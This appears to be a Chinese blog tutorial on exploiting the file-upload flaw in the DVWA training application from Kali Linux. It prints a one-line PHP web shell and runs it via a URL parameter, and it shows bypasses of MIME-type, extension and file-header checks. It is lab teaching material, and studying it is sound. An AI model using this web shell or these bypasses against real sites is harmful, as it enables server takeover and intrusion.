Kali渗透测试(七)—— DVWA文件上传漏洞利用

Kali linux渗透测试—— 文件上传

一. 简介
上传的文件对应用程序构成了重大风险。 许多攻击的第一步是向要攻击的系统获取一些代码。 然后,攻击仅需要找到一种方法来执行代码。 使用文件上传可帮助攻击者完成第一步。
无限制文件上传的后果可能会有所不同,包括完整的系统接管,文件系统过载,将攻击转发到后端系统以及简单的破坏。 这取决于应用程序如何处理上传的文件,包括文件的存储位置。

主要利用方式
1.直接上传 webshell
2.修改文件类型上传 webshell:mimetype 文件头、扩展名
3.修改扩展名上传 webshell:静态解析文件扩展名可能无法执行
4.文件头绕过过滤文件上传 webshell
5.防御措施:删除目录执行权限增加安全性

二.测试
1.测试 dvwa low 安全级别,从源代码看这个级别没有任何防护,可以上传任意文件
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第1张图片
测试:上传一个简单的木马 1.php文件

<?php
	echo shell_exec($_GET['cmd']);
?>

Kali渗透测试(七)—— DVWA文件上传漏洞利用_第2张图片
上传成功,到这个目录下执行任意命令即可如pwd
http://192.168.10.136/dvwa/hackable/uploads/1.php?cmd=pwd
命令执行成功
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第3张图片2.测试dvwa medium 级别,可以看到对文件类型和大小做了限制
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第4张图片
启用Burpsuite修改文件类型为image/jpeg即可
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第5张图片
ok上传成功
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第6张图片3.high 级别,按照文件真实扩展名判断,也可以绕过
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第7张图片
修改文件名和类型
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第8张图片

测试一下,ok
192.168.10.136/dvwa/hackable/uploads/1.php.jpg?cmd=lsKali渗透测试(七)—— DVWA文件上传漏洞利用_第9张图片
还有种方式,先随便上传一个图片抓包截断修改内容如下,防止系统对文件头做检验
Kali渗透测试(七)—— DVWA文件上传漏洞利用_第10张图片
测试一下,也ok吼吼吼吼吼
在这里插入图片描述

Kali渗透测试(七)—— DVWA文件上传漏洞利用_第11张图片

你可能感兴趣的:(安全,kali)